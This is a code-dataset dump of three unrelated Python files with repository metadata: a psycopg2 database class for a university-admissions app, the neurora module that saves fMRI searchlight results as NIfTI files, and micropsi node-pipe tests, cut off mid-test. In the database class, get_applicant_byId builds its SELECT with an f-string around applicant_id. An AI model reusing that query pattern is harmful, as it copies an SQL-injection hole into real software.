] | 1 | 2021-11-27T18:27:56.000Z | 2021-11-27T18:27:56.000Z | gsas_web/project/db/access_database.py | MohammedAlaaNassar/Mayan-EDMS-GSAS | f9c406fb3950c2534f8501f95197e4deffca85f5 | [
"Apache-2.0"
] | null | null | null | gsas_web/project/db/access_database.py | MohammedAlaaNassar/Mayan-EDMS-GSAS | f9c406fb3950c2534f8501f95197e4deffca85f5 | [
"Apache-2.0"
] | null | null | null | from typing import Dict, List, Union
import psycopg2
from project.db.config_database import ConfigDatabase
class AccessDataBase(ConfigDatabase):
def __init__(self) -> None:
self.logger.debug('Init Class AccessDataBase')
conn = psycopg2.connect(**self.postgres_access)
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.table_name}(
message_id SERIAL PRIMARY KEY NOT NULL,
message_title varchar(30) NOT NULL UNIQUE,
author_name varchar(30) NOT NULL,
message_text varchar(200) NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.applicants_table}(
applicant_id SERIAL PRIMARY KEY NOT NULL,
name varchar(100) NOT NULL,
email varchar(50) NOT NULL,
university varchar(100) NOT NULL,
faculty varchar(100) NOT NULL,
department varchar(100) NOT NULL,
graduation_year int NOT NULL,
gpa varchar(100) NOT NULL,
doc_birthdate text NULL,
doc_bsc_cert text NULL,
doc_r_letters text NULL,
status int NOT NULL,
program_id int NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.programs_table}(
program_id SERIAL PRIMARY KEY NOT NULL,
name varchar(100) NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.reviewers_table}(
reviewer_id SERIAL PRIMARY KEY NOT NULL,
name varchar(100) NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
cursor = conn.cursor()
query = f'''CREATE TABLE IF NOT EXISTS {self.scores_table}(
id SERIAL PRIMARY KEY NOT NULL,
reviewer_id int NOT NULL,
applicant_id int NOT NULL,
score int NOT NULL,
creation_date date NOT NULL)'''
cursor.execute(query)
cursor.close()
conn.commit()
self.logger.debug('CLASS AccessDataBase INITIATED')
def init_data(self):
conn = psycopg2.connect(**self.postgres_access)
cursor = conn.cursor()
query = f'''INSERT INTO {self.programs_table} (name,creation_date) VALUES ('College of engineering, Computer Dept.','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.programs_table} (name,creation_date) VALUES ('College of engineering, Electronics Dept.','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.programs_table} (name,creation_date) VALUES ('College of engineering, Industrial Dept.','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.reviewers_table} (name,creation_date) VALUES ('A','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.reviewers_table} (name,creation_date) VALUES ('B','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.reviewers_table} (name,creation_date) VALUES ('C','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.reviewers_table} (name,creation_date) VALUES ('D','2000-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 1', 's1@gmail.com', 'Alexandria University', 'College of engineering', 'Computer Dept', 2019, '3.5', 'a', 'a', 'a', 0,1, '2021-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 2', 's2@gmail.com', 'AASTMT', 'College of engineering', 'Electronics Dept', 2020, '3.5', 'a', 'a', 'a', 0,3, '2021-10-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 3', 's3@gmail.com', 'Ain Shams University', 'College of engineering', 'Mechanics Dept', 2021, '3.9', 'a', 'a', 'a', 0,2, '2021-11-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 4', 's4@gmail.com', 'Alexandria University', 'College of engineering', 'Computer Dept', 2019, '3.5', 'a', 'a', 'a', 0,1, '2021-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 5', 's5@gmail.com', 'AASTMT', 'College of engineering', 'Electronics Dept', 2020, '3.5', 'a', 'a', 'a', 0,3, '2021-10-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 6', 's6@gmail.com', 'Ain Shams University', 'College of engineering', 'Mechanics Dept', 2021, '3.9', 'a', 'a', 'a', 0,2, '2021-11-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 7', 's7@gmail.com', 'Alexandria University', 'College of engineering', 'Computer Dept', 2019, '3.5', 'a', 'a', 'a', 0,1, '2021-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 8', 's8@gmail.com', 'AASTMT', 'College of engineering', 'Electronics Dept', 2020, '3.5', 'a', 'a', 'a', 0,3, '2021-10-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 9', 's9@gmail.com', 'Ain Shams University', 'College of engineering', 'Mechanics Dept', 2021, '3.9', 'a', 'a', 'a', 0,2, '2021-11-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 10', 's10@gmail.com', 'Alexandria University', 'College of engineering', 'Computer Dept', 2019, '3.5', 'a', 'a', 'a', 0,1, '2021-12-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 11', 's11@gmail.com', 'AASTMT', 'College of engineering', 'Electronics Dept', 2020, '3.5', 'a', 'a', 'a', 0,3, '2021-10-16 12:21:13')'''
cursor.execute(query)
cursor.close()
cursor = conn.cursor()
query = f'''INSERT INTO {self.applicants_table} (name, email, university, faculty, department, graduation_year, gpa, doc_birthdate, doc_bsc_cert, doc_r_letters, status,program_id, creation_date) VALUES('Student 12', 's12@gmail.com', 'Ain Shams University', 'College of engineering', 'Mechanics Dept', 2021, '3.9', 'a', 'a', 'a', 0,2, '2021-11-16 12:21:13')'''
cursor.execute(query)
cursor.close()
conn.commit()
self.logger.debug('data initiated')
def get_applicants(self):
self.logger.debug('GETTING APPLICANTS')
conn = psycopg2.connect(**self.postgres_access)
self.logger.debug('DB CONNECTED')
cursor = conn.cursor()
select_query = f"select a.*,p.name as program_name from {self.applicants_table} a , {self.programs_table} p where p.program_id =a.program_id "
cursor.execute(select_query)
self.logger.debug('QUERY EXECUTED')
applicants = cursor.fetchall()
cursor.close()
conn.commit()
self.logger.debug('RETURNING APPLICANTS')
return applicants
def get_applicant_byId(self,applicant_id):
self.logger.debug('GETTING APPLICANT BY ID')
conn = psycopg2.connect(**self.postgres_access)
self.logger.debug('DB CONNECTED')
cursor = conn.cursor()
select_query = f"select a.*,p.name as program_name from {self.applicants_table} a , {self.programs_table} p where p.program_id =a.program_id AND a.applicant_id={applicant_id}"
cursor.execute(select_query)
self.logger.debug('QUERY EXECUTED')
applicant = cursor.fetchone()
cursor.close()
conn.commit()
self.logger.debug('RETURNING APPLICANT ID ')
return applicant
| 52.875598 | 367 | 0.627364 | 1,423 | 11,051 | 4.747013 | 0.103303 | 0.027979 | 0.061584 | 0.074611 | 0.855366 | 0.852554 | 0.845152 | 0.845152 | 0.831828 | 0.831828 | 0 | 0.050592 | 0.236268 | 11,051 | 208 | 368 | 53.129808 | 0.749763 | 0 | 0 | 0.60355 | 0 | 0.12426 | 0.637795 | 0.05548 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023669 | false | 0 | 0.017751 | 0 | 0.059172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ada1a3c511d1808d22deaed1ba0186988066b08b | 16,678 | py | Python | neurora/nii_save.py | neurora/neurora.io | eff6b715c89daae499aeb75450a26657d8cd3e4c | [
"MIT"
] | 50 | 2019-08-29T06:09:30.000Z | 2022-03-20T02:24:36.000Z | neurora/nii_save.py | neurora/neurora.io | eff6b715c89daae499aeb75450a26657d8cd3e4c | [
"MIT"
] | 3 | 2020-11-24T22:01:58.000Z | 2021-11-26T02:09:52.000Z | neurora/nii_save.py | neurora/neurora.io | eff6b715c89daae499aeb75450a26657d8cd3e4c | [
"MIT"
] | 14 | 2019-09-11T08:50:57.000Z | 2022-01-04T09:19:47.000Z | # -*- coding: utf-8 -*-
' a module for saving the RSA results in a .nii file for fMRI '
__author__ = 'Zitong Lu'
import numpy as np
import nibabel as nib
from nilearn.image import smooth_img
import math
from scipy.stats import t
from neurora.stuff import fwe_correct, fdr_correct, cluster_fwe_correct, cluster_fdr_correct, get_HOcort, get_bg_ch2bet,\
mask_to
from neurora.rsa_plot import plot_brainrsa_rlts
' a function for saving the searchlight correlation coefficients as a NIfTI file for fMRI '
def corr_save_nii(corrs, affine, filename=None, corr_mask=get_HOcort(), size=[60, 60, 60], ksize=[3, 3, 3], strides=[1, 1, 1], p=1, r=0, correct_method=None, clusterp=0.05, smooth=True, plotrlt=True, img_background=None):
"""
Save the searchlight correlation coefficients as a NIfTI file for fMRI
Parameters
----------
corrs : array
The similarities between behavioral data and fMRI data for searchlight.
The shape of RDMs is [n_x, n_y, n_z, 2]. n_x, n_y, n_z represent the number of calculation units for searchlight
along the x, y, z axis and 2 represents a r-value and a p-value.
affine : array or list
The position information of the fMRI-image array data in a reference space.
filename : string. Default is None - 'rsa_result.nii'.
The file path+filename for the result .nii file.
If the filename does not end in ".nii", it will be filled in automatically.
corr_mask : string. Default is get_HOcort().
The filename of a mask data for correcting the RSA result.
It can just be one of your fMRI data files in your experiment for a mask file for ROI. If the corr_mask is a
filename of a ROI mask file, only the RSA results in ROI will be visible.
size : array or list [nx, ny, nz]. Default is [60, 60, 60].
The size of the fMRI-img in your experiments.
ksize : array or list [kx, ky, kz]. Default is [3, 3, 3].
The size of the calculation unit for searchlight.
kx, ky, kz represent the number of voxels along the x, y, z axis.
strides : array or list [sx, sy, sz]. Default is [1, 1, 1].
The strides for calculating along the x, y, z axis.
p : float. Default is 1.
The threshold of p-values.
Only the results those p-values are lower than this value will be visible.
r : float. Default is 0.
The threshold of r-values.
Only the results those r-values are higher than this value will be visible.
correct_method : None or string 'FWE' or 'FDR'. Default is None.
The method for correcting the RSA results.
If correct_method='FWE', here the FWE-correction will be used. If correct_methd='FDR', here the FDR-correction
will be used. If correct_method=None, no correction.
Only when p<1, correct_method works.
clusterp : float. Default is 0.05.
The threshold of p-value for cluster-wise correction.
Only when correct_method='Cluster-FDR' or 'Cluster-FWE', clusterp works.
smooth : bool True or False. Default is True.
Smooth the RSA result or not.
plotrlt : bool True or False.
Plot the RSA result automatically or not.
img_background : None or string. Default if None.
The filename of a background image that the RSA results will be plotted on the top of it.
If img_background=None, the background will be ch2.nii.gz.
Only when plotrlt=True, img_background works.
Returns
-------
img : array
The array of the correlation coefficients map.
The shape is [nx, ny, nz]. nx, ny, nz represent the size of the fMRI-img.
Notes
-----
A result .nii file of searchlight correlation coefficients will be generated at the corresponding address of filename.
"""
if len(np.shape(corrs)) != 4 or len(np.shape(affine)) != 2 or np.shape(affine)[0] != 4 or np.shape(affine)[1] != 4:
return "Invalid input!"
# get the size of the fMRI-img
nx = size[0]
ny = size[1]
nz = size[2]
# the size of the calculation units for searchlight
kx = ksize[0]
ky = ksize[1]
kz = ksize[2]
rx = int((kx-1)/2)
ry = int((ky-1)/2)
rz = int((kz-1)/2)
# strides for calculating along the x, y, z axis
sx = strides[0]
sy = strides[1]
sz = strides[2]
# calculate the number of the calculation units in the x, y, z directions
n_x = np.shape(corrs)[0]
n_y = np.shape(corrs)[1]
n_z = np.shape(corrs)[2]
corrsr = corrs[:, :, :, 0]
# initialize the img array to save the sum-r-value for each voxel
img_nii = np.zeros([nx, ny, nz], dtype=np.float64)
# initialize a mask in order to record valid voxels (have qualified results)
mask = np.zeros([nx, ny, nz], dtype=np.int)
# get the p-values
corrsp = corrs[:, :, :, 1]
# do the correction
if p < 1:
# FDR-correction
if correct_method == "FDR":
corrsp = fdr_correct(corrsp, p_threshold=p)
# FWE-correction
if correct_method == "FWE":
corrsp = fwe_correct(corrsp, p_threshold=p)
# iterate through all the calculation units again
# record the valid voxels
# [n_x, n_y, n_z] expanses into [nx, ny, nz] based on ksize & strides
for i in range(n_x):
for j in range(n_y):
for k in range(n_z):
x = i * sx
y = j * sy
z = k * sz
# p-values<threshold-p & r-values>threshold-r
if (corrsp[i, j, k] < p) and (corrsr[i, j, k] > r):
mask[x + rx, y + ry, z + rz] = 1
if (math.isnan(corrsr[i, j, k]) == False):
img_nii[x+rx, y+ry, z+rz] = img_nii[x+rx, y+ry, z+rz] + corrsr[i, j, k]
# initialize the newimg array to calculate the avg-r-value for each voxel
newimg_nii = np.full([nx, ny, nz], np.nan)
# calculate the avg values of each valid voxel
for i in range(nx):
for j in range(ny):
for k in range(nz):
# valid voxel
if mask[i, j, k] == 1:
# sum-r-value/index
newimg_nii[i, j, k] = img_nii[i, j, k]
# set filename for result .nii file
if filename == None:
filename = "rsa_result.nii"
else:
q = ".nii" in filename
if q == True:
filename = filename
else:
filename = filename+".nii"
# corr_mask != None
# use the mask file to correct RSA results
# in order to avoid results showing outside of the brain
if corr_mask == get_HOcort():
mask_to(get_bg_ch2bet(), size, affine, filename=filename)
mask = nib.load(filename).get_fdata()
else:
# load the array data of the mask file
mask = nib.load(corr_mask).get_fdata()
# do correction by the mask
if corr_mask != None:
for i in range(nx):
for j in range(ny):
for k in range(nz):
if (math.isnan(mask[i, j, k]) is True) or mask[i, j, k] == 0:
newimg_nii[i, j, k] = np.nan
print(filename)
print("Save RSA results.")
# save the .nii file for RSA results
file = nib.Nifti1Image(newimg_nii, affine)
if smooth == True:
# smooth the img data of the .nii file
file = smooth_img(file, fwhm='fast')
# save the result
nib.save(file, filename)
# determine if it has results
norlt = np.isnan(newimg_nii).all()
if norlt == True:
print("No RSA results.")
print("File("+filename+") saves successfully!")
# determine plot the results or not
if norlt == False and plotrlt == True:
print("Plot RSA results.")
plot_brainrsa_rlts(filename, background=img_background, type='r')
return newimg_nii
' a function for saving the searchlight statistical results as a NIfTI file for fMRI '
def stats_save_nii(corrs, affine, filename=None, corr_mask=get_HOcort(), size=[60, 60, 60], ksize=[3, 3, 3], strides=[1, 1, 1], p=0.05, df=20, correct_method=None, clusterp=0.05, smooth=False, plotrlt=True, img_background=None):
"""
Save the searchlight RSA statistical results as a NIfTI file for fMRI
Parameters
----------
corrs : array
The statistical results between behavioral data and fMRI data for searchlight.
The shape of RDMs is [n_x, n_y, n_z, 2]. n_x, n_y, n_z represent the number of calculation units for searchlight
along the x, y, z axis and 2 represents a t-value and a p-value.
If the filename does not end in ".nii", it will be filled in automatically.
affine : array or list
The position information of the fMRI-image array data in a reference space.
filename : string. Default is None - 'rsa_result.nii'.
The file path+filename for the result .nii file.
corr_mask : string
The filename of a mask data for correcting the RSA result.
It can just be one of your fMRI data files in your experiment for a mask file for ROI. If the corr_mask is a
filename of a ROI mask file, only the RSA results in ROI will be visible.
size : array or list [nx, ny, nz]. Default is [60, 60, 60].
The size of the fMRI-img in your experiments.
ksize : array or list [kx, ky, kz]. Default is [3, 3, 3].
The size of the calculation unit for searchlight.
kx, ky, kz represent the number of voxels along the x, y, z axis.
strides : array or list [sx, sy, sz]. Default is [1, 1, 1].
The strides for calculating along the x, y, z axis.
p : float. Default is 0.05.
The threshold of p-values.
Only the results those p-values are lower than this value will be visible.
df : int. Default is 20.
The degree of freedom.
correct_method : None or string 'FWE' or 'FDR' or 'Cluster-FWE' or 'Cluster-FDR'. Default is None.
The method for correcting the RSA results.
If correct_method='FWE', here the FWE-correction will be used. If correct_methd='FDR', here the FDR-correction
will be used. If correct_method='Cluster-FWE', here the Cluster-wise FWE-correction will be used. If
correct_methd='Cluster-FDR', here the Cluster-wise FDR-correction will be used. If correct_method=None, no
correction.
Only when p<1, correct_method works.
clusterp : float. Default is 0.05.
The threshold of p-value for cluster-wise correction.
Only when correct_method='Cluster-FDR' or 'Cluster-FWE', clusterp works.
smooth : bool True or False. Default is False.
Smooth the RSA result or not.
plotrlt : bool True or False. Default is True.
Plot the RSA result automatically or not.
img_background : None or string. Default if None.
The filename of a background image that the RSA results will be plotted on the top of it.
If img_background=None, the background will be ch2.nii.gz.
Only when plotrlt=True, img_background works.
Returns
-------
img : array
The array of the statistical results t-values map.
The shape is [nx, ny, nz]. nx, ny, nz represent the size of the fMRI-img.
Notes
-----
A result .nii file of searchlight statistical results will be generated at the corresponding address of filename.
"""
if len(np.shape(corrs)) != 4 or len(np.shape(affine)) != 2 or np.shape(affine)[0] != 4 or np.shape(affine)[1] != 4:
return "Invalid input!"
# get the size of the fMRI-img
nx = size[0]
ny = size[1]
nz = size[2]
# the size of the calculation units for searchlight
kx = ksize[0]
ky = ksize[1]
kz = ksize[2]
rx = int((kx-1)/2)
ry = int((ky-1)/2)
rz = int((kz-1)/2)
# strides for calculating along the x, y, z axis
sx = strides[0]
sy = strides[1]
sz = strides[2]
# calculate the number of the calculation units in the x, y, z directions
n_x = np.shape(corrs)[0]
n_y = np.shape(corrs)[1]
n_z = np.shape(corrs)[2]
img_nii = np.zeros([nx, ny, nz], dtype=np.float64)
# initialize a mask in order to record valid voxels (have qualified results)
mask = np.zeros([nx, ny, nz], dtype=np.int)
# get the p-values
corrsp = corrs[:, :, :, 1]
corrst = corrs[:, :, :, 0]
# calculate the number of voxels for correction
fadeimg = np.zeros([nx, ny, nz], dtype=np.int)
# iterate through all the calculation units
# calculate the indexs
for i in range(n_x):
for j in range(n_y):
for k in range(n_z):
x = i*sx
y = j*sy
z = k*sz
if corrsp[i, j, k] < 1:
img_nii[x + rx, y + ry, z + rz] = corrst[i, j, k]
if corrsp[i, j, k] < p:
fadeimg[x + rx, y + ry, z + rz] = 1
n_corrected = 0
for i in range(nx):
for j in range(ny):
for k in range(nz):
if fadeimg[i, j, k] == 1:
n_corrected = n_corrected + 1
print(str(n_corrected)+" voxels will be corrected.")
# do the correction
if p < 1:
# FDR-correction
if correct_method == "FDR":
corrsp = fdr_correct(corrsp, p_threshold=p)
# FWE-correction
if correct_method == "FWE":
corrsp = fwe_correct(corrsp, p_threshold=p)
# Cluster-wise FDR-correction
if correct_method == "Cluster-FDR":
corrsp = cluster_fdr_correct(corrsp, p_threshold1=p, p_threshold2=clusterp)
# Cluster-wise FWE-correction
if correct_method == "Cluster-FWE":
corrsp = cluster_fwe_correct(corrsp, p_threshold1=p, p_threshold2=clusterp)
# iterate through all the calculation units again
print("Record the valid voxels.")
for i in range(n_x):
for j in range(n_y):
for k in range(n_z):
x = i * sx
y = j * sy
z = k * sz
if corrsp[i, j, k] < p:
mask[x + rx, y + ry, z + rz] = 1
# initialize the newimg array to calculate the avg-r-value for each voxel
newimg_nii = np.full([nx, ny, nz], np.nan)
t_threshold = t.isf(p, df)
print("t threshold: " + str(t_threshold))
# set filename for result .nii file
if filename == None:
filename = "rsa_result.nii"
else:
q = ".nii" in filename
if q == True:
filename = filename
else:
filename = filename + ".nii"
# corr_mask != None
# use the mask file to correct RSA results
# in order to avoid results showing outside of the brain
if corr_mask == get_HOcort():
mask_to(get_bg_ch2bet(), size, affine, filename)
cmask = nib.load(filename).get_fdata()
else:
# load the array data of the mask file
cmask = nib.load(corr_mask).get_fdata()
# calculate the avg values of each valid voxel
for i in range(nx):
for j in range(ny):
for k in range(nz):
# valid voxel
if (math.isnan(cmask[i, j, k]) == False) and cmask[i, j, k] != 0 and mask[i, j, k] == 1:
# sum-r-value/index
newimg_nii[i, j, k] = img_nii[i, j, k]
if newimg_nii[i, j, k] < t_threshold:
newimg_nii[i, j, k] = np.nan
print("Get RSA results.")
print(filename)
print("Save RSA results.")
# save the .nii file for RSA results
file = nib.Nifti1Image(newimg_nii, affine)
if smooth == True:
print("Smooth the results.")
# smooth the img data of the .nii file
file = smooth_img(file, fwhm='fast')
# save the result
nib.save(file, filename)
# determine if it has results
norlt = np.isnan(newimg_nii).all()
if norlt == True:
print("No RSA results.")
print("File("+filename+") saves successfully!")
# determine plot the results or not
if norlt == False and plotrlt == True:
print("Plot RSA results.")
plot_brainrsa_rlts(filename, background=img_background, type='t')
return newimg_nii
"""from neurora.stuff import get_affine
affine = get_affine("/Users/zitonglu/Downloads/isc_results_p0.001_fdr1.nii")
import h5py
stats = np.array(h5py.File("/Users/zitonglu/Downloads/All_tom.h5", "r")["stats"])
stats_save_nii(stats, affine, filename="all_0.05", corr_mask=get_HOcort(), size=[79, 95, 68], ksize=[3, 3, 3], strides=[1, 1, 1], p=0.05, df=23, correct_method="Cluster-FDR", clusterp=0.05, smooth=False, plotrlt=True, img_background=None)"""
| 35.111579 | 241 | 0.611464 | 2,574 | 16,678 | 3.892774 | 0.102564 | 0.010978 | 0.006587 | 0.005988 | 0.843713 | 0.82485 | 0.805988 | 0.789421 | 0.746707 | 0.746407 | 0 | 0.016168 | 0.287984 | 16,678 | 474 | 242 | 35.185654 | 0.827621 | 0.480333 | 0 | 0.735135 | 0 | 0 | 0.078201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010811 | false | 0 | 0.037838 | 0 | 0.07027 | 0.081081 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d100ad2d1bd3516154abb977aaacd71bff1e0fc0 | 20,354 | py | Python | micropsi_core/tests/test_node_pipe_logic.py | brucepro/micropsi2 | 84c304d5339f25d112da5565fb2cd98c31524f94 | [
"Apache-2.0"
] | null | null | null | micropsi_core/tests/test_node_pipe_logic.py | brucepro/micropsi2 | 84c304d5339f25d112da5565fb2cd98c31524f94 | [
"Apache-2.0"
] | null | null | null | micropsi_core/tests/test_node_pipe_logic.py | brucepro/micropsi2 | 84c304d5339f25d112da5565fb2cd98c31524f94 | [
"Apache-2.0"
] | null | null | null | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
"""
Tests for node activation propagation and gate arithmetic
"""
from micropsi_core import runtime as micropsi
def prepare(fixed_nodenet):
nodenet = micropsi.get_nodenet(fixed_nodenet)
netapi = nodenet.netapi
netapi.delete_node(netapi.get_node("ACTA"))
netapi.delete_node(netapi.get_node("ACTB"))
source = netapi.create_node("Register", "Root", "Source")
netapi.link(source, "gen", source, "gen")
source.activation = 1
nodenet.step()
return nodenet, netapi, source
def add_directional_activators(fixed_nodenet):
net = micropsi.get_nodenet(fixed_nodenet)
netapi = net.netapi
sub_act = netapi.create_node("Activator", "Root", "sub-activator")
net.get_node(sub_act.uid).set_parameter("type", "sub")
sur_act = netapi.create_node("Activator", "Root", "sur-activator")
net.get_node(sur_act.uid).set_parameter("type", "sur")
por_act = netapi.create_node("Activator", "Root", "por-activator")
net.get_node(por_act.uid).set_parameter("type", "por")
ret_act = netapi.create_node("Activator", "Root", "ret-activator")
net.get_node(ret_act.uid).set_parameter("type", "ret")
cat_act = netapi.create_node("Activator", "Root", "cat-activator")
net.get_node(cat_act.uid).set_parameter("type", "cat")
exp_act = netapi.create_node("Activator", "Root", "exp-activator")
net.get_node(exp_act.uid).set_parameter("type", "exp")
return sub_act, sur_act, por_act, ret_act, cat_act, exp_act
def test_node_pipe_logic_subtrigger(fixed_nodenet):
# test a resting classifier, expect sub to be activated
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
netapi.link(source, "gen", n_head, "sub", 1)
net.step()
assert n_head.get_gate("sub").activation == 1
def test_node_pipe_logic_classifier_two_off(fixed_nodenet):
# test a resting classifier, expect no activation
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 0
def test_node_pipe_logic_classifier_two_partial(fixed_nodenet):
# test partial success of a classifier (fuzzyness)
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link(source, "gen", n_a, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 1 / 2
netapi.link(source, "gen", n_b, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 1
def test_node_pipe_logic_classifier_two_partially_failing(fixed_nodenet):
# test fuzzyness with one node failing
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link(source, "gen", n_a, "sur", -1)
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == - 1 / 2
netapi.link(source, "gen", n_b, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 0
def test_node_pipe_logic_classifier_three_off(fixed_nodenet):
# test a resting classifier, expect no activation
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
n_c = netapi.create_node("Pipe", "Root", "C")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link_with_reciprocal(n_head, n_c, "subsur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 0
def test_node_pipe_logic_classifier_three_partial(fixed_nodenet):
# test partial success of a classifier (fuzzyness)
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
n_c = netapi.create_node("Pipe", "Root", "C")
netapi.link_with_reciprocal(n_head, n_a, "subsur")
netapi.link_with_reciprocal(n_head, n_b, "subsur")
netapi.link_with_reciprocal(n_head, n_c, "subsur")
netapi.link(source, "gen", n_a, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 1 / 3
netapi.link(source, "gen", n_c, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 2 / 3
netapi.link(source, "gen", n_b, "sur")
for i in range(1, 3):
net.step()
assert n_head.get_gate("gen").activation == 1
def test_node_pipe_logic_classifier_three_partially_failing(fixed_nodenet):
# test fuzzyness with one node failing
net, netapi, source = prepare(fixed_nodenet)
n_head = netapi.create_node("Pipe", "Root", "Head")
n_a = netapi.create_node("Pipe", "Root", "A")
n_b = netapi.create_node("Pipe", "Root", "B")
